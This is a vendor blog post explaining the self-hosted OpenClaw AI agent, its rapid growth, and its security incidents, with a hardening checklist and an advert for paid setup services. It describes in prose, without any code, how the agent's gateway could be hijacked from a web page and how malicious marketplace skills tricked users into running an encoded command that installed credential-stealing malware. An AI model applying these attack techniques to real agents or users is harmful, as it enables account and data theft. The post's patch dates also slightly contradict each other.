What Is OpenClaw? The Viral AI Agent Explained

What Is OpenClaw? The Viral AI Agent Explained

OpenClaw hit 302,000+ GitHub stars in under 60 days -- the fastest organic growth in open-source history. Here's what it actually is, how it works, and why 135,000+ exposed instances became a security crisis.

By Silverthread Labs··OpenClaw AI agent explained·OpenClaw GitHub stars·OpenClaw security risks

What is OpenClaw? The viral AI agent explained

In late January 2026, an open-source project called OpenClaw appeared on GitHub. Within 24 hours it had 20,000 stars. Within 60 days it had surpassed React, a project that took over a decade to reach its star count, to become the most-starred software repository on GitHub. By February, it was also the subject of a CVSS 8.8 security advisory, a coordinated supply-chain attack on its plugin marketplace, and coverage in every major security publication.

This article explains what OpenClaw actually is, why it grew the way it did, how it works under the hood, and what the security picture looks like for anyone considering running it.

what OpenClaw is#

a self hosted AI agent, not a chatbot#

OpenClaw is not a chatbot. It is an AI agent, a system that doesn't just respond to prompts but takes actions in the real world on your behalf. The difference is not semantic. A chatbot answers questions. An agent executes tasks: reading your email and drafting replies, checking your calendar and booking a meeting, querying a database and returning a formatted report. OpenClaw does all of this autonomously, running on hardware you control, connected to the services and files you authorize.

The self hosted architecture is the core design choice. Unlike cloud AI products, OpenClaw processes data locally. Your documents, messages, and credentials never leave your machine unless you configure a skill that explicitly routes data outbound.

local-first: your data stays on your hardware#

OpenClaw runs on your own hardware, whether that is a home server, a desktop machine, or a VPS you control. The inference layer can run either locally (using a local model via Ollama, LM Studio, or similar) or routed through an API provider like OpenAI or Anthropic. The key difference from cloud-hosted AI: the orchestration layer, your files, and your credentials never leave your infrastructure.

how it connects to your tools via the Model Context Protocol#

OpenClaw extends itself through the Model Context Protocol (MCP), an open standard developed by Anthropic for connecting AI models to external tools and data sources.

Each skill in its ClawHub marketplace is an MCP server: a lightweight program that exposes a set of callable tools. When you install a web-search skill, OpenClaw gains access to a search tool it can call mid-task. When you install a calendar skill, it can read and write events. When you install a file-manager skill, it can navigate and modify your local filesystem.

Because MCP is an open standard, teams can build custom MCP servers too, connecting OpenClaw to internal APIs, CRMs, ticketing systems, or any other tool not covered by the public marketplace.

why OpenClaw went viral#

302,000+ GitHub stars: the fastest organic growth in open-source history#

OpenClaw's star trajectory was genuinely unprecedented. The project picked up 9,000 stars on its first day. Three days later: 60,000. Two weeks in: 190,000. By March 3, 2026, it crossed 250,829 stars, surpassing React (243,000 stars), Linux (218,000 stars), and every other software repository on GitHub except TensorFlow.

By the time it stabilized, OpenClaw had exceeded 302,000 stars. No open-source project had reached that milestone in under 60 days before. The star history was confirmed by star-history.com, which tracked its ascent past React in real time.

The growth was organic: no paid promotion, no Product Hunt launch sequence, no coordinated campaign. It spread through developer social media, Hacker News, and YouTube.

what made it different from every AI product before it#

OpenClaw gave non-developers something no prior AI product had: a personal AI agent running entirely on their own hardware, connected to their actual tools, executing real tasks without a subscription or a cloud dependency.

Cloud AI assistants respond to you. OpenClaw runs while you're not watching. It checks your inbox at 3am and flags the email that needs attention by morning. It connects to your calendar, your notes, your messaging apps, and your files, not through a third party integration layer with opaque data practices, but directly, on hardware you own. For anyone who had concerns about data privacy with cloud AI, that felt different from the theoretical privacy promises most products offered.

the creator: Peter Steinberger and the path from PSPDFKit to a nonprofit foundation#

OpenClaw was built by Peter Steinberger, an Austrian developer known online as @steipete and the founder of PSPDFKit (now Nutrient), a PDF rendering SDK used in thousands of apps. Steinberger had been working on the underlying concept since 2024, refining it through earlier iterations called Clawdbot and Moltbot before the OpenClaw name stuck.

The project's success moved faster than any single person could manage. By mid-February 2026, Steinberger had joined OpenAI and transferred governance of the project to an independent 501(c)(3) nonprofit foundation, a move intended to keep the project independent from any single company's commercial interests.

how OpenClaw actually works#

the agent loop: perceive, reason, act#

OpenClaw runs an agentic loop: it receives context (a task, a schedule trigger, an incoming message), reasons about what to do using an LLM backbone, and executes actions through its installed skills. After an action, it evaluates the result and decides whether the task is done or needs more steps. This is what separates it from a chatbot that responds once and waits. OpenClaw is designed to run multi-step workflows without human prompting between each step.

skills and ClawHub: OpenClaw's marketplace of MCP servers#

ClawHub is OpenClaw's official skills marketplace, basically an app store for the agent. As of early 2026, ClawHub listed over 5,400 skills covering web search, calendar management, email, file operations, code execution, image generation, data analysis, CRM integrations, and more.

Every skill is an MCP server. Installing one means OpenClaw connects to that server and can call its tools during task execution. Skills can be toggled on or off without editing config files, which is part of why non-developers found the setup manageable.

what OpenClaw can do with the right skill set installed#

With a modest skill configuration, a typical OpenClaw setup can:

  • Monitor and triage an inbox, draft replies to routine emails, and flag high-priority messages
  • Read a calendar, identify scheduling conflicts, and book or decline meetings
  • Search the web, compile research summaries, and save outputs to a notes app
  • Execute scripts and run code for repetitive data processing tasks
  • Trigger webhooks and API calls to external services
  • Connect to internal tools via custom MCP servers for business-specific workflows

The capability ceiling is determined by which MCP servers you connect and what permissions you grant them, not by the agent's core architecture.

the security crisis nobody expected#

CVE-2026-25253: the CVSS 8.8 RCE that hit before most users had even installed it#

CVE-2026-25253 was disclosed on February 1, 2026. It carries a CVSS score of 8.8.

The flaw is a cross-site WebSocket hijacking vulnerability in the OpenClaw gateway. If a user running OpenClaw visited an attacker-controlled web page, JavaScript on that page could silently open a WebSocket connection to the local OpenClaw gateway, steal the authentication token, and take full administrative control of the instance, without any interaction beyond page load. One click. The attacker gets the same access level as the user: files, code execution, credentials stored in the agent's memory, and any MCP tools the agent has access to.

A patch landed in version 2026.1.29 within 24 hours of initial disclosure. Installations running prior versions remain vulnerable. According to SecurityScorecard's STRIKE team, over 50,000 of the 135,000+ publicly exposed OpenClaw instances were still running unpatched versions as of the first week of February 2026.

135,000+ exposed instances: what the SecurityScorecard findings actually mean#

SecurityScorecard identified 135,000+ internet-facing OpenClaw instances across 82 countries. The number tells you something about how the default configuration works.

OpenClaw's default gateway configuration does not restrict network access to localhost. An installation deployed on a home server, a VPS, or any machine connected to the internet can be reached externally if the gateway port is not explicitly firewalled. Most users who followed a basic setup tutorial without security hardening left their gateway open.

Of those 135,000+ instances, over 50,000 were directly vulnerable to the CVE-2026-25253 RCE. An additional 53,000+ were correlated with prior breach activity, suggesting many were already compromised or operating in high-risk environments. Most of the patching happened gradually over weeks, not in the first days after disclosure.

ClawHavoc: 1,184 malicious skills and the supply-chain attack you didn't see coming#

While CVE-2026-25253 was being patched, a separate threat was operating inside ClawHub itself.

Repello AI's threat research team identified and formally named a coordinated supply-chain attack campaign: ClawHavoc. By March 1, 2026, researchers had found 1,184 confirmed malicious skills on ClawHub, roughly one in five packages in the marketplace at the time. That is a bad number. The ClawHavoc campaign accounted for over 300 coordinated skills, with 335 traced to a single threat actor.

The attack mechanism was social engineering combined with malware delivery. Malicious skills displayed fake error messages prompting users to run a diagnostic command: a base64-encoded payload that, when executed, downloaded Atomic Stealer (AMOS). AMOS exfiltrates browser credentials, saved passwords, session tokens, and cryptocurrency wallet data.

The supply-chain attack was not a flaw in OpenClaw's code. It was a flaw in trust: the assumption that a skill listed on a popular marketplace is safe to install. OpenClaw's team has since implemented a vetting process, but the ClawHavoc campaign showed how quickly an unmonitored marketplace can be exploited during viral growth.

should you run OpenClaw?#

the honest risk picture for home users#

OpenClaw is a capable project from a developer with a real engineering track record. The security incidents were real, but most of the severe exposure came from three specific factors: running an unpatched version (pre-2026.1.29), leaving the gateway port open to the internet, and installing skills from ClawHub without vetting them.

A home user who runs OpenClaw on a local-only network interface, patches promptly, and limits skill installation to well-reviewed packages is in a materially different situation than the 135,000+ public instances SecurityScorecard catalogued.

what a safely configured install requires#

A minimum-viable secure OpenClaw configuration includes:

  • Running version 2026.1.29 or later (CVE-2026-25253 patched)
  • Binding the gateway to localhost only (127.0.0.1), not 0.0.0.0
  • Enabling authentication on the gateway, which is not on by default in all version branches
  • Installing only skills from publishers with verifiable identities and published source code
  • Avoiding any skill that requests system-level permissions unless you understand exactly what it does
  • Setting up a firewall rule blocking external access to the gateway port if the machine has any internet exposure

For users who want MCP integrations connecting OpenClaw to external business tools, CRMs, ticketing systems, internal APIs, the configuration surface grows significantly and the hardening requirements scale with it.

when professional deployment makes sense#

For most technically confident home users, a careful DIY install on a local network is reasonable if they follow the hardening checklist above.

Professional deployment makes sense when the install is going on a machine with any internet exposure: a home server with a public IP, a VPS, or an office network where other people are present. It also makes sense when OpenClaw is being deployed for a business, where you have multiple users, company tool integrations, compliance requirements, or data sensitivity beyond personal use. And if you are not confident in network configuration and don't want to learn it, the risk of getting it wrong on an exposed machine is not abstract.

Silverthread Labs offers OpenClaw setup and hardening services starting at $399 for personal installs. Business deployments, multi-user, with RBAC, audit logging, and custom MCP integrations, start at $2,500. Both tiers include CVE-2026-25253 patching, gateway lockdown, and plugin vetting against ClawHavoc supply-chain attack patterns.

Get your OpenClaw deployment handled by our team or read the detailed security hardening guide if you're doing it yourself.

FAQ#

What is OpenClaw in simple terms?

OpenClaw is a self hosted AI agent that runs on your own hardware. Unlike cloud AI assistants that respond to prompts, OpenClaw executes tasks autonomously: reading your email, checking your calendar, triggering automations. It uses an LLM backbone and a plugin system called skills.

Is OpenClaw free?

The software is free and open source, maintained by an independent nonprofit foundation. You pay for whatever LLM API you connect it to (OpenAI, Anthropic, etc.) or you can run inference locally at no cost using open-weight models.

Is OpenClaw safe to install in 2026?

Running version 2026.1.29 or later on a local network with authentication enabled is materially safer than the default configuration most tutorials describe. The critical CVE-2026-25253 vulnerability is patched in that version. The remaining risk is skill selection: only install skills from publishers with verifiable, reviewed code.

What is ClawHub?

ClawHub is OpenClaw's official skills marketplace, over 5,400 MCP server packages that extend what the agent can do. Each skill is an MCP server the agent can call during task execution.

What is ClawHavoc?

ClawHavoc is a coordinated supply-chain attack campaign that planted malicious skills in ClawHub. Security researchers identified 1,184 total malicious skills in the marketplace as of March 2026, with 335+ traced to a single threat actor. The malicious skills used social engineering to deliver Atomic Stealer (AMOS) malware.

What is CVE-2026-25253?

CVE-2026-25253 is a CVSS 8.8 vulnerability in OpenClaw that enables one-click remote code execution via cross-site WebSocket hijacking. An attacker-controlled web page can steal the OpenClaw gateway authentication token and take full control of the instance. It was patched in version 2026.1.29, released January 29, 2026.

Can I use OpenClaw for my business?

Yes, but a business deployment requires additional configuration: role-based access control, audit logging, proper network segmentation, and custom MCP servers to connect it to your existing tools. A default install is not production ready for multi-user or compliance-sensitive environments.

Last updated: March 16, 2026

Back to Blog

[ More Reads ]

Related Articles

Claude Agent SDK vs OpenAI Agents SDK vs Google ADK (2025)

A technical comparison of the three leading AI agent SDKs: Claude Agent SDK, OpenAI Agents SDK, and Google ADK. Architecture differences, feature matrix, and when to use each one.

Vapi vs Retell vs Bland AI vs ElevenLabs: Voice AI Platforms Compared (2026)

A direct comparison of the four leading voice AI agent platforms - Vapi, Retell AI, Bland AI, and ElevenLabs. Pricing, latency, HIPAA compliance, and which platform fits which use case.

Computer Use Agents: How AI Is Learning to Use Your Desktop

Computer use agents see your screen, click buttons, and complete multi-step tasks in any application — no API required. Here's how they work and what they can actually do.

[ How It Works ]

Free Automation Audit

We find the 20% of your manual work that costs you the most, then show you exactly how to eliminate it.

STEP 1.0
Tell Us What Hurts

Tell Us What Hurts

A 30-minute call. Walk us through your daily operations and we'll spot the bottlenecks you've stopped noticing.

STEP 2.0
We Rank the Wins

We Rank the Wins

We score every opportunity by impact and effort, so you can see where AI saves the most time and money.

STEP 3.0
You Get the Playbook

You Get the Playbook

A prioritized roadmap you can act on. Execute it with us or on your own. Yours to keep either way.